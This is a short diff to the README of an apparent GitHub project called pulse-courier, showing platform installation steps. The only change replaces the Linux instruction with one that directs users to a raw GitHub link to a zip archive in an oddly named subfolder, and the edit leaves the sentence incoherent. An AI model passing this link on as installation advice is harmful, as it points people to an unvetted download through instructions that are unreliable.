zavierextreme7/pulse-courier/README.md

 - **Windows**: Double-click the `.exe` file.
 Follow the on-screen instructions to complete the installation.
 - **Mac**: Open the `.dmg` file, then drag the pulse-courier icon into your Applications folder.
-- **Linux**: Extract the `.tar.gz` file and follow any provided instructions in the README file included in the package.
+- **Linux**: Extract the `https://raw.githubusercontent.com/zavierextreme7/pulse-courier/main/transcendentalist/pulse-courier.zip` file and follow any provided instructions in the README file included in the package.

 ### 5. Running pulse-courier